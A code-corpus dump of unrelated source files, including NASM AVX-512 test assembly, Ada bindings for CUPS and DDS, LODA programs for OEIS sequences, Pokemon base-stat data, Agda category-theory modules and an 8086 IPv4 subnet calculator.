LITERAL tokens */ STRING_LITERAL : '"' ('\\"' |.)*? '"' | '\'' ('\\\'' | .)*? '\'' ; /********** MAKE SURE THIS IS THE LAST TOKEN **********/ UNKNOWN : . ;
travis/test/vpcmp.asm
johannkoenig/nasm
1,052
26402
<reponame>johannkoenig/nasm<filename>travis/test/vpcmp.asm<gh_stars>1000+ bits 64 vpcmpeqb k2{k2},zmm0,zmm1 vpcmpgtb k2{k2},zmm0,zmm1 vpcmpeqw k2{k2},zmm0,zmm1 vpcmpgtw k2{k2},zmm0,zmm1 vpcmpeqd k2{k2},zmm0,zmm1 vpcmpgtd k2{k2},zmm0,zmm1 vpcmpeqq k2{k2},zmm0,zmm1 vpcmpgtq k2{k2},zmm0,zmm1 vpcmpb k2{k2},zmm0,zmm1,0 vpcmpb k2{k2},zmm0,zmm1,6 vpcmpw k2{k2},zmm0,zmm1,0 vpcmpw k2{k2},zmm0,zmm1,6 vpcmpd k2{k2},zmm0,zmm1,0 vpcmpd k2{k2},zmm0,zmm1,6 vpcmpq k2{k2},zmm0,zmm1,0 vpcmpq k2{k2},zmm0,zmm1,6 vpcmpneqb k2{k2},zmm0,zmm1 vpcmpleb k2{k2},zmm0,zmm1 vpcmpneqw k2{k2},zmm0,zmm1 vpcmplew k2{k2},zmm0,zmm1 vpcmpneqd k2{k2},zmm0,zmm1 vpcmpled k2{k2},zmm0,zmm1 vpcmpneqq k2{k2},zmm0,zmm1 vpcmpleq k2{k2},zmm0,zmm1
src/gen/cups-cups_pwg_h.ads
persan/a-cups
0
1887
<reponame>persan/a-cups pragma Ada_2005; pragma Style_Checks (Off); with Interfaces.C; use Interfaces.C; with Interfaces.C.Strings; with System; private package CUPS.cups_pwg_h is -- arg-macro: function PWG_FROM_POINTS (int)(((n) * 2540 + 36) / 72 -- return int)(((n) * 2540 + 36) / 72; -- arg-macro: function PWG_TO_POINTS ((n) * 72.0 / 2540.0 -- return (n) * 72.0 / 2540.0; -- * "$Id: pwg.h 4274 2013-04-09 20:10:23Z msweet $" -- * -- * PWG media API definitions for CUPS. -- * -- * Copyright 2009-2013 by Apple Inc. -- * -- * These coded instructions, statements, and computer programs are the -- * property of Apple Inc. and are protected by Federal copyright -- * law. Distribution and use rights are outlined in the file "LICENSE.txt" -- * which should have been included with this file. If this file is -- * file is missing or damaged, see the license at "http://www.cups.org/". -- * -- * This file is subject to the Apple OS-Developed Software exception. -- -- * C++ magic... -- -- * Macros... -- -- Convert from points to hundredths of millimeters -- Convert from hundredths of millimeters to points -- * Types and structures... -- --*** Map element - PPD to/from PWG -- PWG media keyword type pwg_map_s is record pwg : Interfaces.C.Strings.chars_ptr; -- cups/pwg.h:46 ppd : Interfaces.C.Strings.chars_ptr; -- cups/pwg.h:47 end record; pragma Convention (C_Pass_By_Copy, pwg_map_s); -- cups/pwg.h:44 -- PPD option keyword subtype pwg_map_t is pwg_map_s; --*** Common media size data *** -- PWG 5101.1 "self describing" name type pwg_media_s is record pwg : Interfaces.C.Strings.chars_ptr; -- cups/pwg.h:52 legacy : Interfaces.C.Strings.chars_ptr; -- cups/pwg.h:53 ppd : Interfaces.C.Strings.chars_ptr; -- cups/pwg.h:54 width : aliased int; -- cups/pwg.h:55 length : aliased int; -- cups/pwg.h:56 end record; pragma Convention (C_Pass_By_Copy, pwg_media_s); -- cups/pwg.h:50 -- IPP/ISO legacy name -- Standard Adobe PPD name -- Width in 2540ths -- Length in 2540ths subtype pwg_media_t is pwg_media_s; --*** Size element - PPD to/from PWG -- Map element type pwg_size_s is record map : aliased pwg_map_t; -- cups/pwg.h:61 width : aliased int; -- cups/pwg.h:62 length : aliased int; -- cups/pwg.h:63 left : aliased int; -- cups/pwg.h:64 bottom : aliased int; -- cups/pwg.h:65 right : aliased int; -- cups/pwg.h:66 top : aliased int; -- cups/pwg.h:67 end record; pragma Convention (C_Pass_By_Copy, pwg_size_s); -- cups/pwg.h:59 -- Width in 2540ths -- Length in 2540ths -- Left margin in 2540ths -- Bottom margin in 2540ths -- Right margin in 2540ths -- Top margin in 2540ths subtype pwg_size_t is pwg_size_s; -- * Functions... -- -- * "$Id: pwg.h 4274 2013-04-09 20:10:23Z msweet $" -- * -- * PWG media API definitions for CUPS. -- * -- * Copyright 2009-2013 by Apple Inc. -- * -- * These coded instructions, statements, and computer programs are the -- * property of Apple Inc. and are protected by Federal copyright -- * law. Distribution and use rights are outlined in the file "LICENSE.txt" -- * which should have been included with this file. If this file is -- * file is missing or damaged, see the license at "http://www.cups.org/". -- * -- * This file is subject to the Apple OS-Developed Software exception. -- function pwgFormatSizeName (keyword : Interfaces.C.Strings.chars_ptr; keysize : size_t; prefix : Interfaces.C.Strings.chars_ptr; name : Interfaces.C.Strings.chars_ptr; width : int; length : int; units : Interfaces.C.Strings.chars_ptr) return int; -- cups/pwg.h:75 pragma Import (C, pwgFormatSizeName, "pwgFormatSizeName"); function pwgInitSize (size : access pwg_size_t; job : System.Address; margins_set : access int) return int; -- cups/pwg.h:79 pragma Import (C, pwgInitSize, "pwgInitSize"); function pwgMediaForLegacy (legacy : Interfaces.C.Strings.chars_ptr) return access pwg_media_t; -- cups/pwg.h:81 pragma Import (C, pwgMediaForLegacy, "pwgMediaForLegacy"); function pwgMediaForPPD (ppd : Interfaces.C.Strings.chars_ptr) return access pwg_media_t; -- cups/pwg.h:82 pragma Import (C, pwgMediaForPPD, "pwgMediaForPPD"); function pwgMediaForPWG (pwg : Interfaces.C.Strings.chars_ptr) return access pwg_media_t; -- cups/pwg.h:83 pragma Import (C, pwgMediaForPWG, "pwgMediaForPWG"); function pwgMediaForSize (width : int; length : int) return access pwg_media_t; -- cups/pwg.h:84 pragma Import (C, pwgMediaForSize, "pwgMediaForSize"); end CUPS.cups_pwg_h;
programs/oeis/199/A199032.asm
neoneye/loda
22
167923
<reponame>neoneye/loda ; A199032: 3*12^n-1. ; 2,35,431,5183,62207,746495,8957951,107495423,1289945087,15479341055,185752092671,2229025112063,26748301344767,320979616137215,3851755393646591,46221064723759103,554652776685109247,6655833320221310975,79869999842655731711,958439998111868780543,11501279977342425366527,138015359728109104398335,1656184316737309252780031,19874211800847711033360383,238490541610172532400324607,2861886499322070388803895295,34342637991864844665646743551,412111655902378135987760922623,4945339870828537631853131071487,59344078449942451582237572857855,712128941399309418986850874294271,8545547296791713027842210491531263,102546567561500556334106525898375167 mov $1,12 pow $1,$0 sub $1,1 mul $1,3 add $1,2 mov $0,$1
src/mapcode_utils-str_tools.ads
mapcode-foundation/mapcode-ada
1
16746
<gh_stars>1-10 -- ----------------------------------------------------------------------------- -- Copyright (C) 2003-2019 Stichting Mapcode Foundation (http://www.mapcode.com) -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. -- You may obtain a copy of the License at -- -- http://www.apache.org/licenses/LICENSE-2.0 -- -- Unless required by applicable law or agreed to in writing, software -- distributed under the License is distributed on an "AS IS" BASIS, -- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -- See the License for the specific language governing permissions and -- limitations under the License. -- ----------------------------------------------------------------------------- -- Various utilities on strings package Mapcode_Utils.Str_Tools is -- Convert the characters of Str into upper char function Upper_Str (Str : String) return String; -- Convert the characters of Str: -- Any letter that follows a letter is lower char -- Any other letter (including the first letter) is UPPER char function Mixed_Str (Str : String) return String; -- Locate the Nth occurence of a fragment within a string, -- between a given index (first/last if 0) and the end/beginning of the -- string, searching forward or backward -- Return the index in Within of the char matching the start of Fragment -- Return 0 if Index not in Within, if Within or Fragment is empty, -- or if not found -- Locate Nth occurence of a fragment within a string, -- between a given index (first/last if 0) and the end/beginning of string, -- searching forward or backward -- Returns index in Within of char matching start of Fragment -- or 0 if not found or if Within or Fragment is empty function Locate (Within : String; Fragment : String; From_Index : Natural := 0; Forward : Boolean := True; Occurence : Positive := 1) return Natural; end Mapcode_Utils.Str_Tools;
data/pokemon/base_stats/noctowl.asm
AtmaBuster/pokeplat-gen2
6
25594
db 0 ; species ID placeholder db 100, 50, 50, 70, 76, 96 ; hp atk def spd sat sdf db NORMAL, FLYING ; type db 90 ; catch rate db 162 ; base exp db NO_ITEM, NO_ITEM ; items db GENDER_F50 ; gender ratio db 15 ; step cycles to hatch INCBIN "gfx/pokemon/noctowl/front.dimensions" db GROWTH_MEDIUM_FAST ; growth rate dn EGG_FLYING, EGG_FLYING ; egg groups db 70 ; happiness ; tm/hm learnset tmhm TOXIC, HIDDEN_POWER, SUNNY_DAY, HYPER_BEAM, PROTECT, RAIN_DANCE, FRUSTRATION, RETURN, PSYCHIC_M, SHADOW_BALL, DOUBLE_TEAM, REFLECT, AERIAL_ACE, FACADE, SECRET_POWER, REST, ATTRACT, THIEF, STEEL_WING, ROOST, ENDURE, SILVER_WIND, RECYCLE, GIGA_IMPACT, PSYCH_UP, CAPTIVATE, SLEEP_TALK, NATURAL_GIFT, DREAM_EATER, SWAGGER, PLUCK, SUBSTITUTE, FLY, DEFOG, AIR_CUTTER, HEAT_WAVE, MUD_SLAP, OMINOUS_WIND, SWIFT, TWISTER, UPROAR, ZEN_HEADBUTT ; end
programs/oeis/204/A204008.asm
jmorken/loda
1
4297
; A204008: Symmetric matrix based on f(i,j) = max{3i+j-3,i+3j-3}, by antidiagonals. ; 1,4,4,7,5,7,10,8,8,10,13,11,9,11,13,16,14,12,12,14,16,19,17,15,13,15,17,19,22,20,18,16,16,18,20,22,25,23,21,19,17,19,21,23,25,28,26,24,22,20,20,22,24,26,28,31,29,27,25,23,21,23,25,27,29,31,34,32,30 mul $0,2 mov $1,4 lpb $0 add $0,3 add $2,$1 add $2,2 mov $1,$2 trn $2,$0 trn $0,$1 add $0,$2 lpe add $1,$0 sub $1,3
src/stack_top_win_x86.asm
znone/taskpp
4
306
.386 .MODEL FLAT .CODE ?stack_top@this_task@taskpp@@YAPAXXZ PROC PUBLIC mov eax, esp add eax, 4 ret ?stack_top@this_task@taskpp@@YAPAXXZ ENDP END
examples/outdated-and-incorrect/AIM6/Cat/lib/Data/String.agda
shlevy/agda
1,989
17361
<reponame>shlevy/agda<filename>examples/outdated-and-incorrect/AIM6/Cat/lib/Data/String.agda module Data.String where import Data.List import Data.Char open Data.List using (List) open Data.Char postulate String : Set {-# BUILTIN STRING String #-} infixr 50 _++_ private primitive primStringAppend : String -> String -> String primStringToList : String -> List Char primStringFromList : List Char -> String _++_ = primStringAppend toList = primStringToList fromList = primStringFromList
src/Categories/Adjoint/Instance/Core.agda
Trebor-Huang/agda-categories
279
8122
<reponame>Trebor-Huang/agda-categories {-# OPTIONS --without-K --safe #-} module Categories.Adjoint.Instance.Core where -- The adjunction between the forgetful functor from Cats to Groupoids -- and the Core functor. open import Level using (_⊔_) import Function open import Categories.Adjoint using (_⊣_) open import Categories.Category using (Category) import Categories.Category.Construction.Core as C open import Categories.Category.Groupoid using (Groupoid) open import Categories.Category.Instance.Cats using (Cats) open import Categories.Category.Instance.Groupoids using (Groupoids) open import Categories.Functor using (Functor; _∘F_; id) open import Categories.Functor.Instance.Core using (Core) import Categories.Morphism as Morphism import Categories.Morphism.Reasoning as MR open import Categories.Morphism.IsoEquiv using (⌞_⌟) open import Categories.NaturalTransformation using (ntHelper) open import Categories.NaturalTransformation.NaturalIsomorphism using (refl; _≃_) -- The forgetful functor from Groupoids to Cats Forgetful : ∀ {o ℓ e} → Functor (Groupoids o ℓ e) (Cats o ℓ e) Forgetful = record { F₀ = category ; F₁ = Function.id ; identity = refl ; homomorphism = refl ; F-resp-≈ = Function.id } where open Groupoid -- Core is right-adjoint to the forgetful functor from Groupoids to -- Cats CoreAdj : ∀ {o ℓ e} → Forgetful {o} {ℓ ⊔ e} {e} ⊣ Core CoreAdj = record { unit = ntHelper record { η = unit ; commute = λ {G} {H} F → unit-commute {G} {H} F } ; counit = ntHelper record { η = counit ; commute = counit-commute } ; zig = λ {G} → zig {G} ; zag = zag } where open Groupoid using (category) module Core = Functor Core unit : ∀ G → Functor (category G) (C.Core (category G)) unit G = record { F₀ = Function.id ; F₁ = λ f → record { from = f ; to = f ⁻¹ ; iso = iso } ; identity = ⌞ Equiv.refl ⌟ ; homomorphism = ⌞ Equiv.refl ⌟ ; F-resp-≈ = λ eq → ⌞ eq ⌟ } where open Groupoid G unit-commute : ∀ {G H} (F : Functor (category G) (category H)) → unit H ∘F F ≃ Core.F₁ F ∘F unit G unit-commute {G} {H} F = record { F⇒G = record { η = λ _ → ≅.refl ; commute = λ _ → ⌞ MR.id-comm-sym (category H) ⌟ ; sym-commute = λ _ → ⌞ MR.id-comm (category H) ⌟ } ; F⇐G = record { η = λ _ → ≅.refl ; commute = λ _ → ⌞ MR.id-comm-sym (category H) ⌟ ; sym-commute = λ _ → ⌞ MR.id-comm (category H) ⌟ } ; iso = λ _ → record { isoˡ = ⌞ identityˡ ⌟ ; isoʳ = ⌞ identityˡ ⌟ } } where open Category (category H) open Morphism (category H) counit : ∀ C → Functor (C.Core C) C counit C = record { F₀ = Function.id ; F₁ = _≅_.from ; identity = Equiv.refl ; homomorphism = Equiv.refl ; F-resp-≈ = λ where ⌞ eq ⌟ → eq } where open Category C open Morphism C counit-commute : ∀ {C D} (F : Functor C D) → counit D ∘F Core.F₁ F ≃ F ∘F counit C counit-commute {C} {D} F = record { F⇒G = record { η = λ _ → D.id ; commute = λ _ → MR.id-comm-sym D ; sym-commute = λ _ → MR.id-comm D } ; F⇐G = record { η = λ _ → D.id ; commute = λ _ → MR.id-comm-sym D ; sym-commute = λ _ → MR.id-comm D } ; iso = λ _ → _≅_.iso ≅.refl } where module D = Category D open Morphism D zig : ∀ {G} → counit (category G) ∘F unit G ≃ id zig {G} = record { F⇒G = record { η = λ _ → G.id ; commute = λ _ → MR.id-comm-sym (category G) ; sym-commute = λ _ → MR.id-comm (category G) } ; F⇐G = record { η = λ _ → G.id ; commute = λ _ → MR.id-comm-sym (category G) ; sym-commute = λ _ → MR.id-comm (category G) } ; iso = λ _ → _≅_.iso ≅.refl } where module G = Groupoid G open Morphism G.category zag : ∀ {B} → Core.F₁ (counit B) ∘F unit (Core.F₀ B) ≃ id zag {B} = record { F⇒G = record { η = λ _ → ≅.refl ; commute = λ _ → ⌞ MR.id-comm-sym B ⌟ ; sym-commute = λ _ → ⌞ MR.id-comm B ⌟ } ; F⇐G = record { η = λ _ → ≅.refl ; commute = λ _ → ⌞ MR.id-comm-sym B ⌟ ; sym-commute = λ _ → ⌞ MR.id-comm B ⌟ } ; iso = λ _ → record { isoˡ = ⌞ identityˡ ⌟ ; isoʳ = ⌞ identityˡ ⌟ } } where open Category B open Morphism B
src/display.adb
jrmarino/ravenadm
18
7601
<filename>src/display.adb -- This file is covered by the Internet Software Consortium (ISC) License -- Reference: ../License.txt with HelperText; package body Display is package HT renames HelperText; -------------------------------------------------------------------------------------------- -- insert_history -------------------------------------------------------------------------------------------- procedure insert_history (HR : history_rec) is begin if history_arrow = cyclic_range'Last then history_arrow := cyclic_range'First; else history_arrow := history_arrow + 1; end if; history (history_arrow) := HR; end insert_history; ------------------------------------------------------------------------ -- fmtpc ------------------------------------------------------------------------ function fmtpc (f : Float; percent : Boolean) return fivelong is type loadtype is delta 0.01 digits 4; result : fivelong := (others => ' '); raw1 : constant loadtype := loadtype (f); raw2 : constant String := raw1'Img; raw3 : constant String := raw2 (2 .. raw2'Last); rlen : constant Natural := raw3'Length; start : constant Natural := 6 - rlen; begin result (start .. 5) := raw3; if percent then result (5) := '%'; end if; return result; end fmtpc; ------------------------------------------------------------------------ -- fmtload ------------------------------------------------------------------------ function fmtload (f : Float) return fivelong is type loadtype is delta 0.01 digits 4; result : fivelong := (others => ' '); begin if f < 100.0 then return fmtpc (f, False); elsif f < 1000.0 then declare type loadtype is delta 0.1 digits 4; raw1 : constant loadtype := loadtype (f); begin return HT.trim (raw1'Img); end; elsif f < 10000.0 then declare raw1 : constant Integer := Integer (f); begin -- preceded by space, 1000.0 .. 9999.99, should be 5 chars return raw1'Img; end; elsif f < 100000.0 then declare raw1 : constant Integer := Integer (f); begin -- 100000.0 .. 99999.9 return HT.trim (raw1'Img); end; else return "100k+"; end if; exception when others => return "ERROR"; end fmtload; end Display;
ip_calculator.asm
retq/IPv4-Calculator
0
2325
<filename>ip_calculator.asm include "emu8086.inc" org 100h ; Various procedures called to do the task call input call printip call binary call network call broadcast call subn call host call wild call pause call credits call endprog input proc ;-------------------------- Opening screen ---------------------------------- GOTOXY 34, 10 print "Hello " GOTOXY 23, 13 printn "Welcome to IP calculator(IPv4)" mov cx, 5 ;Used so that the welcome screen stays for few seconds space: printn "" loop space call clear_screen mov cx, 0 GOTOXY 20, 0 print "Input data " GOTOXY 0, 2 ;-----------------------taking IP address as input as 4 octet --------------------------- start: print "Enter octet: " call scan_num printn "" mov ip[si], cl inc si inc e cmp e, 4 jne start ;----------------------- prefix mask and storing -------------------------- printn "" print "Prefix: " mov cx, 2 mov si, 0 prefixing: mov ah, 1 int 21h cmp al, 13 je calc mov mask[si],al inc si loop prefixing ; converts and stores the prefix if it a 2 digit number calc: cmp si, 1 je line1 mov dx, 0 mov cx, si mov si,0 multiple: mov al, mask[si] sub al, 30h mov bl, g mul bl add dx, ax mov g,1 inc si loop multiple mov prefix, dl mov dx, 0 mov ax, 0 jmp print ; converts and stores the prefix if it a 1 digit number line1: mov si, 0 mov al, mask[si] mov prefix, al sub prefix, 30h ret input endp ;--------------------------IP address printing---------------------------- printip proc GOTOXY 20, 8 print "Output " printn "" mov cx,1 print: cmp cx,0 jne r printn "" print "IP Address: " mov cx, 3 mov si, 0 move: mov al, ip[si] mov ah, 0 call print_num mov dl, '.' mov ah, 2 int 21h inc si loop move mov al, ip[si] mov ah, 0 dec cx call print_num r: ret ret printip endp ;----------------------Binary calculation of IP ---------------------------- binary proc mov c, 7 mov si, 0 mov f, 4 moving: mov ah, 0 mov al, ip[si] mov e, si mov bh, 0 MOV bl, 2 mov si, c ;converts each octet into binary and stores it calcbinary: div bl add ah, '0' mov ipbinary[si], ah mov ah, 00 dec si cmp al, 00 jne calcbinary ;manual insertion of dots after each octet mov si, dot mov ipbinary[si], '.' mov netbin[si], '.' mov brdbin[si], '.' mov subnet[si], '.' mov wildmask[si], '.' ;updation of variables so as to use in next iteration add e, 1 mov si, e add c, 9 add dot, 9 sub f, 1 cmp f, 0 jne loop moving ret binary endp ;-------------------------Broadcast address calculation-------------------- broadcast proc brdcast: mov cl, prefix mov ch, 0 mov si, 0 brdcalc: mov al, netbin[si] mov brdbin[si], al inc si loop brdcalc printn "" printn "" print "Broadcast Address: " printing brdbin ret broadcast endp ;--------------------------Network address calculation--------------------- network proc cmp prefix, 8 jle netpart1 cmp prefix, 16 jle part1 jmp check1 part1: add prefix, 1 jmp netpart1 check1: cmp prefix, 24 jle part2 jmp check2 part2: add prefix, 2 jmp netpart1 check2: add prefix, 3 netpart1: mov si, 0 add cl, prefix mov ch, 0 networking: mov bl, ipbinary[si] mov netbin[si], bl inc si loop networking ;printing network address printn "" printn "" print "Network Address: " printing netbin ret network endp ;---------------------------Subnet Mask calculation------------------------- subn proc mov cl, prefix mov ch, 0 mov si, 0 mov subnet[si], 31h sub cl, 1 mov si, 1 subcalc: cmp subnet[si], 46 je temp mov subnet[si], 31h temp: inc si loop subcalc ;printing subnet mask address printn "" printn "" print "Subnet Mask Address: " printing subnet ret subn endp host proc ;-----------------------First host address calculation--------------------- mov si, 34 add netbin[si], 1 ;since 1st host address is same as network address ;printing first host addrss printn "" printn "" print "First Host Address: " printing netbin ;-----------------------Last host address calculation---------------------- mov si, 34 mov brdbin[si], 30h ;since last host address is same as broadcast address ;printing last host addrss printn "" printn "" print "Last Host Address: " printing brdbin ret host endp ;--------------------------Wild mask calculation--------------------------- wild proc mov cl, prefix mov ch, 0 mov si, 0 mov wildmask[si], 30h sub cl, 1 mov si, 1 wildcalc: cmp wildmask[si], 46 je temp1 mov wildmask[si], 30h temp1: inc si loop wildcalc ;printing wild mask addrss printn "" printn "" print "Wild Mask Address: " printing wildmask ret wild endp ;---------------------Printing various address passed as array------------------------------ printing MACRO array local p1,p2,p3,p4,p5 ; to avoid multiple declaration mov loopCon, 0 mov si, 0 mov al, array[si] sub al, 30h mov bl, 2 p1: mov ah, 0 mul bl inc si cmp array[si], '.' je p2 add al, array[si] sub al, 30h mov dl, al add loopCon, 1 cmp loopCon, 31 jne p1 jmp p5 p2: mov ah, 0 mov al, dl call print_num cmp loopCon, 1Ah jle p4 p3: inc si mov al, array[si] mov ah, 0 add loopCon, 1 jmp p1 p4: putc '.' jmp p3 p5: mov al, dl mov ah, 0 call print_num endm ;-------------------------------Credits screen----------------------------- credits proc call clear_screen GOTOXY 36, 2 printn "Credits" GOTOXY 34, 3 print "-----------" GOTOXY 6, 6 printn "<NAME> - 19PD01" GOTOXY 6, 8 printn "<NAME> - 19PD22" ret credits endp ;---------------Used for pausing the program till a key is pressed--------- pause proc printn "" printn "" print "Press any key.." mov ah, 0 int 16h ret pause endp ;---------------------Used at the end to end the program------------------- endprog proc printn "" printn "" print "Press any key.." mov ah, 0 int 16h mov ah, 4ch int 21h ret endprog endp ; Various variables used during processing loopCon db 0 dot dw 8 c dw 0 e dw 0 f dw 0 g db 10 ; Primary variables used for storing output ipbinary db 35 dup('0') netbin db 35 dup('0') brdbin db 35 dup('1') subnet db 35 dup('0') ; variable's size 35 bcoz 4 octet + 3 spot wildmask db 35 dup('1') ; for dots so total of (4*8)+3=35 mask db 2 dup(?) ip db 4 dup(?) prefix db 0 ret define_scan_num define_print_string define_print_num define_print_num_uns define_clear_screen END
oeis/020/A020093.asm
neoneye/loda-programs
11
100124
<gh_stars>10-100 ; A020093: Ceiling of GAMMA(n+5/12)/GAMMA(5/12). ; Submitted by <NAME> ; 1,1,1,2,5,22,117,749,5550,46705,439803,4581281,52302950,649428294,8713162940,125614765717,1936560971460,31791875948135,553708506096682,10197464987280555,198000778503030765,4042515894436878102 max $0,1 mov $1,1 mov $3,1 lpb $0 mul $1,3 mov $2,$0 sub $0,1 mul $2,12 sub $2,7 mul $1,$2 mul $3,36 lpe div $1,$3 mov $0,$1 add $0,1
WS3_ASM/Task_10.asm
OlegMalchenko/ACOS_WS_3
0
165860
<reponame>OlegMalchenko/ACOS_WS_3<gh_stars>0 # # Inputs two integers and prints their sum. # checks whether overflow has occured during the additions # prints 1 if occured, 0 otherwise # .data please_x: .string "Please, input integer x: " please_y: .string "Please, input integer y: " print: .string "\nOverflow occurs if 'overflow = 1',\ni.e. if 'overflow = 0' there's no overflow:\nLet's see then whether it has occured:\n" overflow: .string "overflow = " .text main: #input example for reaching overflow is x = 2147483647, y = 1. # x.input() {max x = 2^31 - 1} li a7, 4 la a0, please_x ecall li a7, 5 ecall add t0, zero, a0 # y.input() {max y = 2^31 - 1} li a7, 4 la a0, please_y ecall li a7, 5 ecall add t1, zero, a0 # intro li a7, 4 la a0, print ecall # z: t2 = t0 + t1 add t2, t0, t1 # an overflow occurs if x + y < x && x + y < y # for x32 architecture of the assembley compiler on ubuntu linux VM # that happens if for some given pair (x,y) and operation R="+" : R(x,y) >= 2^31 # let's then check the condition: if (x+y<x || x+y<y) then: overflow; else: no overflow slt t3, t2, t0 slt t4, t2, t1 li a7, 4 la a0, overflow ecall or a0, t3, t4 li a7, 1 ecall
src/orig/dds-request_reply-connext_c_untyped_impl.adb
alexcamposruiz/dds-requestreply
0
9989
<filename>src/orig/dds-request_reply-connext_c_untyped_impl.adb pragma Ada_2012; package body DDS.Request_Reply.connext_c_untyped_impl is ---------------------------------------------------- -- RTI_Connext_EntityUntypedImpl_Wait_For_Samples -- ---------------------------------------------------- function RTI_Connext_EntityUntypedImpl_Wait_For_Samples (Self : not null access RTI_Connext_EntityUntypedImpl; Max_Wait : DDS.Duration_T; Min_Sample_Count : DDS.Natural; Waitset : not null DDS.WaitSet.Ref_Access; Initial_Condition : DDS.ReadCondition.Ref_Access; Condition : DDS.ReadCondition.Ref_Access) return Dds.ReturnCode_T is begin pragma Compile_Time_Warning (Standard.True, "RTI_Connext_EntityUntypedImpl_Wait_For_Samples unimplemented"); return raise Program_Error with "Unimplemented function RTI_Connext_EntityUntypedImpl_Wait_For_Samples"; end RTI_Connext_EntityUntypedImpl_Wait_For_Samples; ----------------------------------------------------- -- RTI_Connext_EntityUntypedImpl_Get_Sample_Loaned -- ----------------------------------------------------- function RTI_Connext_EntityUntypedImpl_Get_Sample_Loaned (Self : not null access RTI_Connext_EntityUntypedImpl; Received_Data : System.Address; Data_Count : out DDS.Integer; Is_Loan : DDS.Boolean; DataSeqContiguousBuffer : System.Address; Info_Seq : not null access DDS.SampleInfo_Seq.Sequence; Data_Seq_Len : DDS.long; Data_Seq_Max_Len : DDS.long; Ownership : DDS.Boolean; Max_Samples : DDS.long; Read_Condition : DDS.ReadCondition.Ref_Access; Take : DDS.Boolean) return Dds.ReturnCode_T is begin pragma Compile_Time_Warning (Standard.True, "RTI_Connext_EntityUntypedImpl_Get_Sample_Loaned unimplemented"); return raise Program_Error with "Unimplemented function RTI_Connext_EntityUntypedImpl_Get_Sample_Loaned"; end RTI_Connext_EntityUntypedImpl_Get_Sample_Loaned; ----------------------------------------------- -- RTI_Connext_EntityUntypedImpl_Send_Sample -- ----------------------------------------------- function RTI_Connext_EntityUntypedImpl_Send_Sample (Self : not null access RTI_Connext_EntityUntypedImpl; Data : System.Address; Info : not null access DDS.WriteParams_T) return DDS.ReturnCode_T is begin pragma Compile_Time_Warning (Standard.True, "RTI_Connext_EntityUntypedImpl_Send_Sample unimplemented"); return raise Program_Error with "Unimplemented function RTI_Connext_EntityUntypedImpl_Send_Sample"; end RTI_Connext_EntityUntypedImpl_Send_Sample; ------------------------------------------------------- -- RTI_Connext_EntityUntypedImpl_wait_for_any_sample -- ------------------------------------------------------- function RTI_Connext_EntityUntypedImpl_wait_for_any_sample (Self : not null access RTI_Connext_EntityUntypedImpl; max_wait : Duration_t; Min_Sample_Count : Integer) return DDS .ReturnCode_T is begin pragma Compile_Time_Warning (Standard.True, "RTI_Connext_EntityUntypedImpl_wait_for_any_sample unimplemented"); return raise Program_Error with "Unimplemented function RTI_Connext_EntityUntypedImpl_wait_for_any_sample"; end RTI_Connext_EntityUntypedImpl_wait_for_any_sample; ----------------------------------------------- -- RTI_Connext_EntityUntypedImpl_Return_Loan -- ----------------------------------------------- function RTI_Connext_EntityUntypedImpl_Return_Loan (Self : not null access RTI_Connext_EntityUntypedImpl; dataArray : System.Address; Info_Seq : not null access SampleInfo_Seq.Sequence) return DDS .ReturnCode_T is begin pragma Compile_Time_Warning (Standard.True, "RTI_Connext_EntityUntypedImpl_Return_Loan unimplemented"); return raise Program_Error with "Unimplemented function RTI_Connext_EntityUntypedImpl_Return_Loan"; end RTI_Connext_EntityUntypedImpl_Return_Loan; -------------------------------------------------- -- RTI_Connext_EntityUntypedImpl_Get_Datawriter -- -------------------------------------------------- function RTI_Connext_EntityUntypedImpl_Get_Datawriter (Self : not null access RTI_Connext_EntityUntypedImpl) return DDS.DataWriter.Ref_Access is begin pragma Compile_Time_Warning (Standard.True, "RTI_Connext_EntityUntypedImpl_Get_Datawriter unimplemented"); return raise Program_Error with "Unimplemented function RTI_Connext_EntityUntypedImpl_Get_Datawriter"; end RTI_Connext_EntityUntypedImpl_Get_Datawriter; -------------------------------------------------- -- RTI_Connext_EntityUntypedImpl_Get_Datareader -- -------------------------------------------------- function RTI_Connext_EntityUntypedImpl_Get_Datareader (Self : not null access RTI_Connext_EntityUntypedImpl) return DDS.DataReader.Ref_Access is begin pragma Compile_Time_Warning (Standard.True, "RTI_Connext_EntityUntypedImpl_Get_Datareader unimplemented"); return raise Program_Error with "Unimplemented function RTI_Connext_EntityUntypedImpl_Get_Datareader"; end RTI_Connext_EntityUntypedImpl_Get_Datareader; ------------------------------------------ -- RTI_Connext_EntityUntypedImpl_Delete -- ------------------------------------------ function RTI_Connext_EntityUntypedImpl_Delete (Self : RTI_Connext_EntityUntypedImpl_Access) return ReturnCode_t is begin pragma Compile_Time_Warning (Standard.True, "RTI_Connext_EntityUntypedImpl_Delete unimplemented"); return raise Program_Error with "Unimplemented function RTI_Connext_EntityUntypedImpl_Delete"; end RTI_Connext_EntityUntypedImpl_Delete; ----------------------------------------------------------- -- RTI_Connext_EntityUntypedImpl_Validate_Receive_Params -- ----------------------------------------------------------- function RTI_Connext_EntityUntypedImpl_Validate_Receive_Params (Self : not null access RTI_Connext_EntityUntypedImpl; METHOD_NAME : Standard.String; Min_Count : long; Max_Count : long; Max_Wait : Duration_T) return Boolean is begin pragma Compile_Time_Warning (Standard.True, "RTI_Connext_EntityUntypedImpl_Validate_Receive_Params unimplemented"); return raise Program_Error with "Unimplemented function RTI_Connext_EntityUntypedImpl_Validate_Receive_Params"; end RTI_Connext_EntityUntypedImpl_Validate_Receive_Params; end DDS.Request_Reply.connext_c_untyped_impl;
projects/Links_Awakening_gb.windfish/configuration/macros/returnIfLt.asm
jverkoey/awaken
68
13793
ld a, [#1] cp #2 ret c
libsrc/zx81/zx_cls.asm
meesokim/z88dk
0
161236
<reponame>meesokim/z88dk ; ; ZX81 libraries - Stefano ; ;---------------------------------------------------------------- ; ; $Id: zx_cls.asm,v 1.7 2015/01/19 01:33:26 pauloscustodio Exp $ ; ;---------------------------------------------------------------- ; ; ROM mode CLS.. useful to expand collapsed display file ; ;---------------------------------------------------------------- PUBLIC zx_cls IF FORzx81 EXTERN restore81 EXTERN zx_topleft ELSE EXTERN filltxt ENDIF zx_cls: IF FORzx81 call restore81 call $a2a jp zx_topleft ELSE ld l,0 jp filltxt ENDIF
src/is-lib/InfSys/Base.agda
boystrange/FairSubtypingAgda
4
7690
